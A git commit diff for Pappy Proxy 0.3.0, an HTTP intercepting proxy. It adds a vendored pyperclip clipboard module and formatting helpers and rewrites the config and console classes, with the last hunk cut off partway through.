Version 0.3.0, move large amount of code to Puppy

This commit is contained in:
Rob Glew 2017-06-29 13:08:20 -07:00
parent 76d20774a5
commit f9737dbdd8
169 changed files with 6463 additions and 43862 deletions

1
pappyproxy/.coverage Normal file

File diff suppressed because one or more lines are too long

View file

@ -1,3 +0,0 @@
[run]
omit = tests/*, schema/*, plugins/*, templates/*

View file

@ -1,22 +0,0 @@
install-third-party:
pip install -e ..
test:
py.test -rw --twisted --cov-config .coveragerc --cov=. tests/
test-verbose:
py.test -v -rw --twisted --cov-config .coveragerc --cov-report term-missing --cov=. tests/
test-macros:
py.test -v -rw --twisted tests/test_macros.py
test-proxy:
py.test -v -rw --twisted tests/test_proxy.py
test-comm:
py.test -v -rw --twisted tests/test_comm.py
test-crypto:
py.test -v -rw --twisted tests/test_crypto.py

View file

@ -1 +0,0 @@
__version__ = '0.2.13'

View file

@ -1,7 +0,0 @@
import pappy
from twisted.internet import reactor
if __name__ == '__main__':
reactor.callWhenRunning(pappy.main)
reactor.run()

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

386
pappyproxy/clip.py Normal file
View file

@ -0,0 +1,386 @@
"""
Copyright (c) 2014, Al Sweigart
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import contextlib
import ctypes
import os
import platform
import subprocess
import sys
import time
from ctypes import c_size_t, sizeof, c_wchar_p, get_errno, c_wchar
EXCEPT_MSG = """
Pyperclip could not find a copy/paste mechanism for your system.
For more information, please visit https://pyperclip.readthedocs.org """
PY2 = sys.version_info[0] == 2
text_type = unicode if PY2 else str
class PyperclipException(RuntimeError):
pass
class PyperclipWindowsException(PyperclipException):
def __init__(self, message):
message += " (%s)" % ctypes.WinError()
super(PyperclipWindowsException, self).__init__(message)
def init_osx_clipboard():
def copy_osx(text):
p = subprocess.Popen(['pbcopy', 'w'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_osx():
p = subprocess.Popen(['pbpaste', 'r'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_osx, paste_osx
def init_gtk_clipboard():
import gtk
def copy_gtk(text):
global cb
cb = gtk.Clipboard()
cb.set_text(text)
cb.store()
def paste_gtk():
clipboardContents = gtk.Clipboard().wait_for_text()
# for python 2, returns None if the clipboard is blank.
if clipboardContents is None:
return ''
else:
return clipboardContents
return copy_gtk, paste_gtk
def init_qt_clipboard():
# $DISPLAY should exist
from PyQt4.QtGui import QApplication
app = QApplication([])
def copy_qt(text):
cb = app.clipboard()
cb.setText(text)
def paste_qt():
cb = app.clipboard()
return text_type(cb.text())
return copy_qt, paste_qt
def init_xclip_clipboard():
def copy_xclip(text):
p = subprocess.Popen(['xclip', '-selection', 'c'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xclip():
p = subprocess.Popen(['xclip', '-selection', 'c', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xclip, paste_xclip
def init_xsel_clipboard():
def copy_xsel(text):
p = subprocess.Popen(['xsel', '-b', '-i'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text)
def paste_xsel():
p = subprocess.Popen(['xsel', '-b', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode()
return copy_xsel, paste_xsel
def init_klipper_clipboard():
def copy_klipper(text):
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'setClipboardContents',
text],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=None)
def paste_klipper():
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'getClipboardContents'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
# Workaround for https://bugs.kde.org/show_bug.cgi?id=342874
# TODO: https://github.com/asweigart/pyperclip/issues/43
clipboardContents = stdout.decode()
# even if blank, Klipper will append a newline at the end
assert len(clipboardContents) > 0
# make sure that newline is there
assert clipboardContents.endswith('\n')
if clipboardContents.endswith('\n'):
clipboardContents = clipboardContents[:-1]
return clipboardContents
return copy_klipper, paste_klipper
def init_no_clipboard():
class ClipboardUnavailable(object):
def __call__(self, *args, **kwargs):
raise PyperclipException(EXCEPT_MSG)
if PY2:
def __nonzero__(self):
return False
else:
def __bool__(self):
return False
return ClipboardUnavailable(), ClipboardUnavailable()
class CheckedCall(object):
def __init__(self, f):
super(CheckedCall, self).__setattr__("f", f)
def __call__(self, *args):
ret = self.f(*args)
if not ret and get_errno():
raise PyperclipWindowsException("Error calling " + self.f.__name__)
return ret
def __setattr__(self, key, value):
setattr(self.f, key, value)
def init_windows_clipboard():
from ctypes.wintypes import (HGLOBAL, LPVOID, DWORD, LPCSTR, INT, HWND,
HINSTANCE, HMENU, BOOL, UINT, HANDLE)
windll = ctypes.windll
safeCreateWindowExA = CheckedCall(windll.user32.CreateWindowExA)
safeCreateWindowExA.argtypes = [DWORD, LPCSTR, LPCSTR, DWORD, INT, INT,
INT, INT, HWND, HMENU, HINSTANCE, LPVOID]
safeCreateWindowExA.restype = HWND
safeDestroyWindow = CheckedCall(windll.user32.DestroyWindow)
safeDestroyWindow.argtypes = [HWND]
safeDestroyWindow.restype = BOOL
OpenClipboard = windll.user32.OpenClipboard
OpenClipboard.argtypes = [HWND]
OpenClipboard.restype = BOOL
safeCloseClipboard = CheckedCall(windll.user32.CloseClipboard)
safeCloseClipboard.argtypes = []
safeCloseClipboard.restype = BOOL
safeEmptyClipboard = CheckedCall(windll.user32.EmptyClipboard)
safeEmptyClipboard.argtypes = []
safeEmptyClipboard.restype = BOOL
safeGetClipboardData = CheckedCall(windll.user32.GetClipboardData)
safeGetClipboardData.argtypes = [UINT]
safeGetClipboardData.restype = HANDLE
safeSetClipboardData = CheckedCall(windll.user32.SetClipboardData)
safeSetClipboardData.argtypes = [UINT, HANDLE]
safeSetClipboardData.restype = HANDLE
safeGlobalAlloc = CheckedCall(windll.kernel32.GlobalAlloc)
safeGlobalAlloc.argtypes = [UINT, c_size_t]
safeGlobalAlloc.restype = HGLOBAL
safeGlobalLock = CheckedCall(windll.kernel32.GlobalLock)
safeGlobalLock.argtypes = [HGLOBAL]
safeGlobalLock.restype = LPVOID
safeGlobalUnlock = CheckedCall(windll.kernel32.GlobalUnlock)
safeGlobalUnlock.argtypes = [HGLOBAL]
safeGlobalUnlock.restype = BOOL
GMEM_MOVEABLE = 0x0002
CF_UNICODETEXT = 13
@contextlib.contextmanager
def window():
"""
Context that provides a valid Windows hwnd.
"""
# we really just need the hwnd, so setting "STATIC"
# as predefined lpClass is just fine.
hwnd = safeCreateWindowExA(0, b"STATIC", None, 0, 0, 0, 0, 0,
None, None, None, None)
try:
yield hwnd
finally:
safeDestroyWindow(hwnd)
@contextlib.contextmanager
def clipboard(hwnd):
"""
Context manager that opens the clipboard and prevents
other applications from modifying the clipboard content.
"""
# We may not get the clipboard handle immediately because
# some other application is accessing it (?)
# We try for at least 500ms to get the clipboard.
t = time.time() + 0.5
success = False
while time.time() < t:
success = OpenClipboard(hwnd)
if success:
break
time.sleep(0.01)
if not success:
raise PyperclipWindowsException("Error calling OpenClipboard")
try:
yield
finally:
safeCloseClipboard()
def copy_windows(text):
# This function is heavily based on
# http://msdn.com/ms649016#_win32_Copying_Information_to_the_Clipboard
with window() as hwnd:
# http://msdn.com/ms649048
# If an application calls OpenClipboard with hwnd set to NULL,
# EmptyClipboard sets the clipboard owner to NULL;
# this causes SetClipboardData to fail.
# => We need a valid hwnd to copy something.
with clipboard(hwnd):
safeEmptyClipboard()
if text:
# http://msdn.com/ms649051
# If the hMem parameter identifies a memory object,
# the object must have been allocated using the
# function with the GMEM_MOVEABLE flag.
count = len(text) + 1
handle = safeGlobalAlloc(GMEM_MOVEABLE,
count * sizeof(c_wchar))
locked_handle = safeGlobalLock(handle)
ctypes.memmove(c_wchar_p(locked_handle), c_wchar_p(text), count * sizeof(c_wchar))
safeGlobalUnlock(handle)
safeSetClipboardData(CF_UNICODETEXT, handle)
def paste_windows():
with clipboard(None):
handle = safeGetClipboardData(CF_UNICODETEXT)
if not handle:
# GetClipboardData may return NULL with errno == NO_ERROR
# if the clipboard is empty.
# (Also, it may return a handle to an empty buffer,
# but technically that's not empty)
return ""
return c_wchar_p(handle).value
return copy_windows, paste_windows
# `import PyQt4` sys.exit()s if DISPLAY is not in the environment.
# Thus, we need to detect the presence of $DISPLAY manually
# and not load PyQt4 if it is absent.
HAS_DISPLAY = os.getenv("DISPLAY", False)
CHECK_CMD = "where" if platform.system() == "Windows" else "which"
def _executable_exists(name):
return subprocess.call([CHECK_CMD, name],
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def determine_clipboard():
# Determine the OS/platform and set
# the copy() and paste() functions accordingly.
if 'cygwin' in platform.system().lower():
# FIXME: pyperclip currently does not support Cygwin,
# see https://github.com/asweigart/pyperclip/issues/55
pass
elif os.name == 'nt' or platform.system() == 'Windows':
return init_windows_clipboard()
if os.name == 'mac' or platform.system() == 'Darwin':
return init_osx_clipboard()
if HAS_DISPLAY:
# Determine which command/module is installed, if any.
try:
import gtk # check if gtk is installed
except ImportError:
pass
else:
return init_gtk_clipboard()
try:
import PyQt4 # check if PyQt4 is installed
except ImportError:
pass
else:
return init_qt_clipboard()
if _executable_exists("xclip"):
return init_xclip_clipboard()
if _executable_exists("xsel"):
return init_xsel_clipboard()
if _executable_exists("klipper") and _executable_exists("qdbus"):
return init_klipper_clipboard()
return init_no_clipboard()
def set_clipboard(clipboard):
global copy, paste
clipboard_types = {'osx': init_osx_clipboard,
'gtk': init_gtk_clipboard,
'qt': init_qt_clipboard,
'xclip': init_xclip_clipboard,
'xsel': init_xsel_clipboard,
'klipper': init_klipper_clipboard,
'windows': init_windows_clipboard,
'no': init_no_clipboard}
copy, paste = clipboard_types[clipboard]()
copy, paste = determine_clipboard()

View file

@ -1,6 +1,12 @@
import re
import itertools
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from pygments.lexers import get_lexer_for_mimetype, HttpLexer
from pygments.formatters import TerminalFormatter
def clen(s):
ansi_escape = re.compile(r'\x1b[^m]*m')
return len(ansi_escape.sub('', s))
@ -96,20 +102,96 @@ def path_formatter(path, width=-1):
colparts.append(c+p+Colors.ENDC)
return '/'.join(colparts)
def host_color(host):
def color_string(s, color_only=False):
"""
Return the string with a a color/ENDC. The same string will always be the same color.
"""
from .util import str_hash_code
# Give each unique host a different color (ish)
if not host:
return Colors.RED
hostcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
return hostcols[hash(host)%(len(hostcols)-1)]
if not s:
return ""
strcols = [Colors.RED,
Colors.GREEN,
Colors.YELLOW,
Colors.BLUE,
Colors.MAGENTA,
Colors.CYAN,
Colors.LRED,
Colors.LGREEN,
Colors.LYELLOW,
Colors.LBLUE,
Colors.LMAGENTA,
Colors.LCYAN]
col = strcols[str_hash_code(s)%(len(strcols)-1)]
if color_only:
return col
else:
return col + s + Colors.ENDC
def pretty_msg(msg):
to_ret = pretty_headers(msg) + '\r\n' + pretty_body(msg)
return to_ret
def pretty_headers(msg):
to_ret = msg.headers_section()
to_ret = highlight(to_ret, HttpLexer(), TerminalFormatter())
return to_ret
def pretty_body(msg):
from .util import printable_data
to_ret = printable_data(msg.body, colors=False)
if 'content-type' in msg.headers:
try:
lexer = get_lexer_for_mimetype(msg.headers.get('content-type').split(';')[0])
to_ret = highlight(to_ret, lexer, TerminalFormatter())
except:
pass
return to_ret
def url_formatter(req, colored=False, always_have_path=False, explicit_path=False, explicit_port=False):
retstr = ''
if not req.use_tls:
if colored:
retstr += Colors.RED
retstr += 'http'
if colored:
retstr += Colors.ENDC
retstr += '://'
else:
retstr += 'https://'
if colored:
retstr += color_string(req.dest_host)
else:
retstr += req.dest_host
if not ((req.use_tls and req.dest_port == 443) or \
(not req.use_tls and req.dest_port == 80) or \
explicit_port):
if colored:
retstr += ':'
retstr += Colors.MAGENTA
retstr += str(req.dest_port)
retstr += Colors.ENDC
else:
retstr += ':{}'.format(req.dest_port)
if (req.url.path and req.url.path != '/') or always_have_path:
if colored:
retstr += path_formatter(req.url.path)
else:
retstr += req.url.path
if req.url.params:
retstr += '?'
params = req.url.params.split("&")
pairs = [tuple(param.split("=")) for param in params]
paramstrs = []
for k, v in pairs:
if colored:
paramstrs += (Colors.GREEN + '{}' + Colors.ENDC + '=' + Colors.LGREEN + '{}' + Colors.ENDC).format(k, v)
else:
paramstrs += '{}={}'.format(k, v)
retstr += '&'.join(paramstrs)
if req.url.fragment:
retstr += '#%s' % req.url.fragment
return retstr

View file

@ -1,112 +0,0 @@
import sys
import base64
import json
from twisted.protocols.basic import LineReceiver
from twisted.internet import defer
from util import PappyException
"""
comm.py
Handles creating a listening server bound to localhost that other processes can
use to interact with the proxy.
"""
debug = False
class CommServer(LineReceiver):
MAX_LENGTH=sys.maxint
def __init__(self):
self.delimiter = '\n'
self.action_handlers = {
'ping': self.action_ping,
'get_request': self.action_get_request,
'get_response': self.action_get_response,
'submit': self.action_submit_request,
}
def lineReceived(self, line):
line = line.strip()
if line == '':
return
#try:
command_data = json.loads(line)
command = command_data['action']
valid = False
if command in self.action_handlers:
valid = True
result = {'success': True}
func_defer = self.action_handlers[command](command_data)
func_defer.addCallback(self.action_result_handler, result)
func_defer.addErrback(self.action_error_handler, result)
if not valid:
raise PappyException('%s is an invalid command' % command_data['action'])
# except PappyException as e:
# return_data = {'success': False, 'message': str(e)}
# self.sendLine(json.dumps(return_data))
def action_result_handler(self, data, result):
result.update(data)
self.sendLine(json.dumps(result))
def action_error_handler(self, error, result):
if debug:
print error.getTraceback()
return_data = {'success': False, 'message': str(error.getTraceback())}
result.update(result)
error.trap(Exception)
self.sendLine(json.dumps(return_data))
return True
def action_ping(self, data):
return defer.succeed({'ping': 'pong'})
@defer.inlineCallbacks
def action_get_request(self, data):
from .http import Request
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist")
dat = json.loads(req.to_json())
defer.returnValue(dat)
@defer.inlineCallbacks
def action_get_response(self, data):
from .http import Request, Response
try:
reqid = data['reqid']
req = yield Request.load_request(reqid)
except KeyError:
raise PappyException("Request with given ID does not exist, cannot fetch associated response.")
if req.response:
rsp = req.response
dat = json.loads(rsp.to_json())
else:
dat = {}
defer.returnValue(dat)
@defer.inlineCallbacks
def action_submit_request(self, data):
from .http import Request
from .plugin import active_intercepting_macros
message = base64.b64decode(data['full_message'])
req = Request(message)
req.host = data['host'].encode('utf-8')
req.port = data['port']
req.is_ssl = data['is_ssl']
yield req.async_submit(mangle=True)
if 'tags' in data:
req.tags = set(data['tags'])
yield req.async_deep_save()
retdata = {}
retdata['request'] = json.loads(req.to_json())
if req.response:
retdata['response'] = json.loads(req.response.to_json())
defer.returnValue(retdata)

View file

@ -1,84 +0,0 @@
#!/usr/bin/env python
import crochet
import glob
import pappyproxy
import zipfile
import tarfile
try:
import bz2
except ImportError:
bz2 = None
print "BZ2 not installed on your system"
from base64 import b64encode, b64decode
from os import getcwd, sep, path, urandom
class Compress(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.zip_archive = sessconfig.archive
self.bz2_archive = sessconfig.archive
def compress_project(self):
if bz2:
self.tar_project()
else:
self.zip_project()
def decompress_project(self):
if bz2:
self.untar_project()
else:
self.unzip_project()
def zip_project(self):
"""
Zip project files
Using append mode (mode='a') will create a zip archive
if none exists in the project.
"""
try:
zf = zipfile.ZipFile(self.zip_archive, mode="a")
zf.write(self.config.crypt_dir)
zf.close()
except zipfile.LargeZipFile as e:
raise PappyException("Project zipfile too large. Error: ", e)
def unzip_project(self):
"""
Extract project files from decrypted zip archive.
Initially checks the zip archive's magic number and
attempts to extract pappy.json to validate integrity
of the zipfile.
"""
if not zipfile.is_zipfile(self.zip_archive):
raise PappyException("Project archive corrupted.")
zf = zipfile.ZipFile(self.zip_archive)
try:
zf.extract("config.json")
except zipfile.BadZipfile as e:
raise PappyException("Zip archive corrupted. Error: ", e)
zf.extractall()
def tar_project(self):
archive = tarfile.open(self.bz2_archive, 'w:bz2')
archive.add(self.config.crypt_dir)
archive.close()
def untar_project(self):
if tarfile.is_tarfile(self.bz2_archive):
# Raise exception if there is a failure
try:
with tarfile.open(self.bz2_archive, "r:bz2") as archive:
archive.extractall()
except tarfile.ExtractError as e:
raise PappyException("Tar archive corrupted. Error: ", e)

View file

@ -1,289 +1,129 @@
import glob
import copy
import json
import os
import shutil
class PappyConfig(object):
"""
The configuration settings for the proxy. To access the config object for the
current session (eg from plugins) use ``pappyproxy.pappy.session.config``.
.. data:: cert_dir
The location of the CA certs that Pappy will use. This can be configured in the
``config.json`` file for a project.
:Default: ``{DATADIR}/certs``
.. data:: pappy_dir
The file where pappy's scripts are located. Don't write anything here, and you
probably don't need to write anything here. Use DATA_DIR instead.
:Default: Wherever the scripts are installed
.. data:: data_dir
The data directory. This is where files that have to be read by Pappy every time
it's run are put. For example, plugins are stored in ``{DATADIR}/plugins`` and
certs are by default stored in ``{DATADIR}/certs``. This defaults to ``~/.pappy``
and isn't configurable right now.
:Default: ``~/.pappy``
.. data:: datafile
The location of the CA certs that Pappy will use. This can be configured in the
``config.json`` file for a project.
:Default: ``data.db``
.. data:: debug_dir
The directory to write debug output to. Don't put this outside the project folder
since it writes all the request data to this directory. You probably won't need
to use this. Configured in the ``config.json`` file for the project.
:Default: None
.. data:: listeners
The list of active listeners. It is a list of dictionaries of the form `{"port": 8000, "interface": "127.0.0.1"}`
Not modifiable after startup. Configured in the ``config.json`` file for the project.
:Default: ``[]``
.. data:: socks_proxy
Details for a SOCKS proxy. It is a dict with the following key/values::
host: The SOCKS proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
:Default: ``null``
.. data:: http_proxy
default_config = """{
"listeners": [
{"iface": "127.0.0.1", "port": 8080}
],
"proxy": {"use_proxy": false, "host": "", "port": 0, "is_socks": false}
}"""
Details for an upstream HTTP proxy. It is a dict with the following key/values::
host: The proxy host
port: The proxy port
username: Username (optional)
password: Password (optional)
If null, no proxy will be used.
.. data:: plugin_dirs
class ProxyConfig:
List of directories that plugins are loaded from. Not modifiable.
:Default: ``['{DATA_DIR}/plugins', '{PAPPY_DIR}/plugins']``
.. data:: save_history
Whether command history should be saved to a file/loaded at startup.
:Default: True
.. data:: config_dict
The dictionary read from config.json. When writing plugins, use this to load
configuration options for your plugin.
.. data:: global_config_dict
The dictionary from ~/.pappy/global_config.json. It contains settings for
Pappy that are specific to the current computer. Avoid putting settings here,
especially if it involves specific projects.
.. data:: archive
Project archive compressed as a ``tar.bz2`` archive if libraries available on the system,
otherwise falls back to zip archive.
:Default: ``project.archive``
.. data:: crypt_dir
Temporary working directory to unpack an encrypted project archive. Directory
will contain copies of normal startup files, e.g. conifg.json, cmdhistory, etc.
On exiting pappy, entire directory will be compressed into an archive and encrypted.
Compressed as a tar.bz2 archive if libraries available on the system,
otherwise falls back to zip.
:Default: ``crypt``
.. data:: crypt_file
Encrypted archive of the temporary working directory ``crypt_dir``. Compressed as a
tar.bz2 archive if libraries available on the system, otherwise falls back to zip.
:Default: ``project.crypt``
.. data:: crypt_session
Boolean variable to determine whether pappy started in crypto mode
:Default: False
.. data:: salt_len
Length of the nonce-salt value appended to the end of `crypt_file`
:Default: 16
"""
def __init__(self):
self.pappy_dir = os.path.dirname(os.path.realpath(__file__))
self.data_dir = os.path.join(os.path.expanduser('~'), '.pappy')
self.cert_dir = os.path.join(self.data_dir, 'certs')
self.datafile = 'data.db'
self.debug_dir = None
self.debug_to_file = False
self.debug_verbosity = 0
self.listeners = []
self.socks_proxy = None
self.http_proxy = None
self.ssl_ca_file = 'certificate.crt'
self.ssl_pkey_file = 'private.key'
self.histsize = 1000
self.plugin_dirs = [os.path.join(self.data_dir, 'plugins'), os.path.join(self.pappy_dir, 'plugins')]
self.config_dict = {}
self.global_config_dict = {}
self.archive = 'project.archive'
self.debug = False
self.crypt_dir = 'crypt'
self.crypt_file = 'project.crypt'
self.crypt_session = False
self.salt_len = 16
def get_default_config(self):
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
with open(default_config_file) as f:
settings = json.load(f)
return settings
def get_project_files(self):
file_glob = glob.glob('*')
pp = os.getcwd() + os.sep
project_files = [pp+f for f in file_glob if os.path.isfile(pp+f)]
if self.crypt_file in project_files:
project_files.remove(self.crypt_file)
return project_files
self._listeners = [('127.0.0.1', 8080, None)]
self._proxy = {'use_proxy': False, 'host': '', 'port': 0, 'is_socks': False}
def load(self, fname):
try:
with open(fname, 'r') as f:
config_info = json.loads(f.read())
except IOError:
config_info = json.loads(default_config)
with open(fname, 'w') as f:
f.write(default_config)
# Listeners
if 'listeners' in config_info:
self._parse_listeners(config_info['listeners'])
@staticmethod
def _parse_proxy_login(conf):
proxy = {}
if 'host' in conf and 'port' in conf:
proxy = {}
proxy['host'] = conf['host'].encode('utf-8')
proxy['port'] = conf['port']
if 'username' in conf:
if 'password' in conf:
proxy['username'] = conf['username'].encode('utf-8')
proxy['password'] = conf['password'].encode('utf-8')
else:
print 'Proxy has a username but no password. Ignoring creds.'
else:
print 'Host is missing host/port.'
return None
return proxy
def load_settings(self, proj_config):
# Substitution dictionary
subs = {}
subs['PAPPYDIR'] = self.pappy_dir
subs['DATADIR'] = self.data_dir
# Data file settings
if 'data_file' in proj_config:
self.datafile = proj_config["data_file"].format(**subs)
# Debug settings
if 'debug_dir' in proj_config:
if proj_config['debug_dir']:
self.debug_to_file = True
self.debug_dir = proj_config["debug_dir"].format(**subs)
# Cert directory settings
if 'cert_dir' in proj_config:
self.cert_dir = proj_config["cert_dir"].format(**subs)
# Listener settings
if "proxy_listeners" in proj_config:
self.listeners = []
for l in proj_config["proxy_listeners"]:
if 'forward_host_ssl' in l:
l['forward_host_ssl'] = l['forward_host_ssl'].encode('utf-8')
if 'forward_host' in l:
l['forward_host'] = l['forward_host'].encode('utf-8')
self.listeners.append(l)
# SOCKS proxy settings
self.socks_proxy = None
if "socks_proxy" in proj_config:
if proj_config['socks_proxy'] is not None:
self.socks_proxy = PappyConfig._parse_proxy_login(proj_config['socks_proxy'])
if 'proxy' in config_info:
self._proxy = config_info['proxy']
# HTTP proxy settings
self.http_proxy = None
if "http_proxy" in proj_config:
if proj_config['http_proxy'] is not None:
self.http_proxy = PappyConfig._parse_proxy_login(proj_config['http_proxy'])
def _parse_listeners(self, listeners):
self._listeners = []
for info in listeners:
if 'port' in info:
port = info['port']
else:
port = 8080
if 'interface' in info:
iface = info['interface']
elif 'iface' in info:
iface = info['iface']
else:
iface = '127.0.0.1'
if "transparent" in info:
trans_info = info['transparent']
transparent_dest = (trans_info.get('host', ""),
trans_info.get('port', 0),
trans_info.get('use_tls', False))
else:
transparent_dest = None
self._listeners.append((iface, port, transparent_dest))
@property
def listeners(self):
return copy.deepcopy(self._listeners)
# History saving settings
if "history_size" in proj_config:
self.histsize = proj_config['history_size']
def load_global_settings(self, global_config):
from .http import Request
if "cache_size" in global_config:
self.cache_size = global_config['cache_size']
else:
self.cache_size = 2000
Request.cache.resize(self.cache_size)
def load_from_file(self, fname):
# Make sure we have a config file
if not os.path.isfile(fname):
print "Copying default config to %s" % fname
default_config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'default_user_config.json')
shutil.copyfile(default_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.config_dict = json.load(f)
self.load_settings(self.config_dict)
def global_load_from_file(self):
# Make sure we have a config file
fname = os.path.join(self.data_dir, 'global_config.json')
if not os.path.isfile(fname):
print "Copying default global config to %s" % fname
default_global_config_file = os.path.join(self.pappy_dir,
'default_global_config.json')
shutil.copyfile(default_global_config_file, fname)
# Load local project config
with open(fname, 'r') as f:
self.global_config_dict = json.load(f)
self.load_global_settings(self.global_config_dict)
@listeners.setter
def listeners(self, val):
self._parse_listeners(val)
@property
def proxy(self):
# don't use this, use the getters to get the parsed values
return self._proxy
@proxy.setter
def proxy(self, val):
self._proxy = val
@property
def use_proxy(self):
if self._proxy is None:
return False
if 'use_proxy' in self._proxy:
if self._proxy['use_proxy']:
return True
return False
@property
def proxy_host(self):
if self._proxy is None:
return ''
if 'host' in self._proxy:
return self._proxy['host']
return ''
@property
def proxy_port(self):
if self._proxy is None:
return ''
if 'port' in self._proxy:
return self._proxy['port']
return ''
@property
def proxy_username(self):
if self._proxy is None:
return ''
if 'username' in self._proxy:
return self._proxy['username']
return ''
@property
def proxy_password(self):
if self._proxy is None:
return ''
if 'password' in self._proxy:
return self._proxy['password']
return ''
@property
def use_proxy_creds(self):
return ('username' in self._proxy or 'password' in self._proxy)
@property
def is_socks_proxy(self):
if self._proxy is None:
return False
if 'is_socks' in self._proxy:
if self._proxy['is_socks']:
return True
return False

View file

@ -7,50 +7,80 @@ import atexit
import cmd2
import os
import readline
import string
#import string
import shlex
import sys
from .util import PappyException
from .colors import Colors
from .proxy import MessageError
###################
## Helper functions
## Helper Functions
def print_pappy_errors(func):
def print_errors(func):
def catch(*args, **kwargs):
try:
func(*args, **kwargs)
except PappyException as e:
print str(e)
except (CommandError, MessageError) as e:
print(str(e))
return catch
def interface_loop(client):
cons = Cmd(client=client)
load_interface(cons)
sys.argv = []
cons.cmdloop()
def load_interface(cons):
from .interface import test, view, decode, misc, context, mangle, macros, tags
test.load_cmds(cons)
view.load_cmds(cons)
decode.load_cmds(cons)
misc.load_cmds(cons)
context.load_cmds(cons)
mangle.load_cmds(cons)
macros.load_cmds(cons)
tags.load_cmds(cons)
##########
## Classes
class ProxyCmd(cmd2.Cmd):
class SessionEnd(Exception):
pass
class CommandError(Exception):
pass
class Cmd(cmd2.Cmd):
"""
An object representing the console interface. Provides methods to add
commands and aliases to the console.
commands and aliases to the console. Implemented as a hack around cmd2.Cmd
"""
def __init__(self, *args, **kwargs):
# the \x01/\x02 are to make the prompt behave properly with the readline library
self.prompt = 'pappy\x01' + Colors.YELLOW + '\x02> \x01' + Colors.ENDC + '\x02'
self.debug = True
self.session = kwargs['session']
del kwargs['session']
self.histsize = 0
if 'histsize' in kwargs:
self.histsize = kwargs['histsize']
del kwargs['histsize']
if 'client' not in kwargs:
raise Exception("client argument is required")
self.client = kwargs['client']
self.client.console = self
del kwargs['client']
self._cmds = {}
self._aliases = {}
# Only read and save history when not in crypto mode
if not self.session.config.crypt_session:
atexit.register(self.save_histfile)
readline.set_history_length(self.session.config.histsize)
if os.path.exists('cmdhistory'):
if self.session.config.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
atexit.register(self.save_histfile)
readline.set_history_length(self.histsize)
if os.path.exists('cmdhistory'):
if self.histsize != 0:
readline.read_history_file('cmdhistory')
else:
os.remove('cmdhistory')
cmd2.Cmd.__init__(self, *args, **kwargs)
@ -61,8 +91,8 @@ class ProxyCmd(cmd2.Cmd):
ret.update(self.__dict__.keys())
ret.update(['do_'+k for k in self._cmds.keys()])
ret.update(['help_'+k for k in self._cmds.keys()])
ret.update(['complete_'+k for k, v in self._cmds.iteritems() if self._cmds[k][1]])
for k, v in self._aliases.iteritems():
ret.update(['complete_'+k for k, v in self._cmds.items() if self._cmds[k][1]])
for k, v in self._aliases.items():
ret.add('do_' + k)
ret.add('help_' + k)
if self._cmds[self._aliases[k]][1]:
@ -74,23 +104,39 @@ class ProxyCmd(cmd2.Cmd):
def f():
if not func.__doc__:
to_print = 'No help exists for function'
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[-1:]
to_print = '\n'.join(string.lstrip(l) for l in lines)
print to_print
else:
lines = func.__doc__.splitlines()
if len(lines) > 0 and lines[0] == '':
lines = lines[1:]
if len(lines) > 0 and lines[-1] == '':
lines = lines[-1:]
to_print = '\n'.join(l.lstrip() for l in lines)
aliases = set()
aliases.add(attr[5:])
for i in range(2):
for k, v in self._aliases.items():
if k in aliases or v in aliases:
aliases.add(k)
aliases.add(v)
